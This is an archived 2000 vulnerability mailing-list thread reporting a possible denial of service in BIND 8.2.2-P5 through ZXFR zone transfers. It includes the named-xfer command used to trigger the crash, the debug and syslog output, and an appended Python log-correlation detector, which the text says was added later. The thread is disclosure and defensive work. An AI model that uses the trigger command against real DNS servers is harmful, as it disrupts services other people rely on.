Vulnerability Development mailing list archives

Re: Possible DOS in Bind 8.2.2-P5 (talked too soon...)


From: Fernando Cardoso <fernando () BN PT>
Date: Wed, 8 Nov 2000 14:10:40 -0000

20 minutes after trying the DoS, named died... No core dumped.

(from /var/log/messages)
Nov  8 11:11:07 dns2 named[309]: approved ZXFR from [x.x.x.1].1795 for "xxx.org"
Nov  8 11:11:07 dns2 named[309]: unsupported XFR (type ZXFR) of "xxx.org" (IN) to [x.x.x.1].1795
Nov  8 11:32:40 dns2 named[309]: rm_datum: DB_F_ACTIVE not set
Nov  8 11:32:40 dns2 named[309]: rm_datum: DB_F_ACTIVE not set

Fernando

_________________________________________________________
Fernando Cardoso              Phone:   +351 21 7982186
Network Administrator         Fax:     +351 21 7982185
National Library              E-mail:  fernando () bn pt
Portugal                      PGP ID:  28551CB8



-----Original Message-----
From: Fernando Cardoso
Sent: Wednesday, 8 November 2000 10:26
To: VULN-DEV () SECURITYFOCUS COM
Cc: 'naif () inet it'
Subject: RE: Possible DOS in Bind 8.2.2-P5


Just tried on RedHat 6.0. No DoS...

[root@dns1 /root]# named-xfer -z xxx.org -d 9 -f dump_dns -Z dns2 -l log.dns

[root@dns1 /root]# cat log.dns.knvl2m
domain `xxx.org'; file `dump_dns'; serial 0
zone found (2): "xxx.org", source = dump_dns
Arg: "dns2" AXFR
addrcnt = 1
getzone() xxx.org secondary
address [x.x.x.2] AXFR
connecting to server #1 [x.x.x.2].53
len = 154
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62154
;; flags: qr aa ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;;      xxx.org, type = SOA, class = IN
xxx.org.            1D IN SOA       dns1. me () somewhere pt. (
                                        200000000      ; serial
                                        8H              ; refresh
                                        2H              ; retry
                                        1W              ; expiry
                                        1D )            ; minimum

xxx.org.            1D IN NS        dns1
xxx.org.            1D IN NS        dns1
dns1          1D IN A         x.x.x.1
dns2          1D IN A         x.x.x.2
need update, serial 200000000
send ZXFR query to x.x.x.2
bufsize = 1024
close(5) succeeded
error receiving zone transfer

[root@dns2 fernando]# tail  /var/log/messages
Nov  8 11:07:56 dns2 named[309]: approved ZXFR from [x.x.x.1].1793 for "xxx.org"
Nov  8 11:07:56 dns2 named[309]: unsupported XFR (type ZXFR) of "xxx.org" (IN) to [x.x.x.1].1793

Fernando

_________________________________________________________
Fernando Cardoso              Phone:   +351 21 7982186
Network Administrator         Fax:     +351 21 7982185
National Library              E-mail:  fernando () bn pt
Portugal                      PGP ID:  28551CB8



Hi,
playing with bind and the ZXFR feature (zone transfer compressed
with a possible insecure
execlp("gzip", "gzip", NULL);), I discovered a Denial Of
Service against Bind 8.2.2-P5.

By default Bind 8.2.2-P5 is not compiled with ZXFR support
unless you define it with #define BIND_ZXFR,
so it will refuse any ZXFR transfer, because it doesn't support it.
But now what happens? Look here...
[...]
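
A defender-side check built from the syslog lines quoted in this thread, as an added example that is not part of the original posts: it flags a named process that logs `rm_datum: DB_F_ACTIVE not set` after refusing a ZXFR request. The sample lines are constructed (documentation addresses, unwrapped), and the one-hour window, the year and the function names are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the format of the syslog lines quoted in the thread
# (documentation addresses and zone name, lines unwrapped).
SAMPLE = """\
Nov  8 11:11:07 dns2 named[309]: approved ZXFR from [192.0.2.1].1795 for "example.org"
Nov  8 11:11:07 dns2 named[309]: unsupported XFR (type ZXFR) of "example.org" (IN) to [192.0.2.1].1795
Nov  8 11:32:40 dns2 named[309]: rm_datum: DB_F_ACTIVE not set
Nov  8 11:32:40 dns2 named[309]: rm_datum: DB_F_ACTIVE not set
"""

LINE = re.compile(r'^(\w{3}\s+\d+ \d\d:\d\d:\d\d) (\S+) named\[(\d+)\]: (.*)$')
ZXFR = re.compile(r'^unsupported XFR \(type ZXFR\) of "([^"]+)" \(IN\) to \[([^\]]+)\]\.(\d+)$')
RM_DATUM = "rm_datum: DB_F_ACTIVE not set"

def parse_ts(stamp, year=2000):
    # Classic syslog timestamps carry no year; the year is an assumption.
    return datetime.strptime(f"{year} {' '.join(stamp.split())}", "%Y %b %d %H:%M:%S")

def correlate(text, window=timedelta(hours=1)):
    """Pair each refused ZXFR with later rm_datum errors from the same named process."""
    refused = {}    # (host, pid) -> [(time, zone, peer), ...]
    findings = []
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        stamp, host, pid, msg = m.groups()
        when, key = parse_ts(stamp), (host, pid)
        z = ZXFR.match(msg)
        if z:
            refused.setdefault(key, []).append((when, z.group(1), z.group(2)))
        elif msg == RM_DATUM:
            for t0, zone, peer in refused.get(key, []):
                if timedelta(0) <= when - t0 <= window:
                    f = {"host": host, "pid": pid, "zone": zone, "peer": peer,
                         "delay_s": int((when - t0).total_seconds())}
                    if f not in findings:   # repeated rm_datum lines count once
                        findings.append(f)
    return findings

if __name__ == "__main__":
    for finding in correlate(SAMPLE):
        print(finding)
```

A finding only shows that the two messages came from the same process within the window; the syslog lines alone do not establish that the process died.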


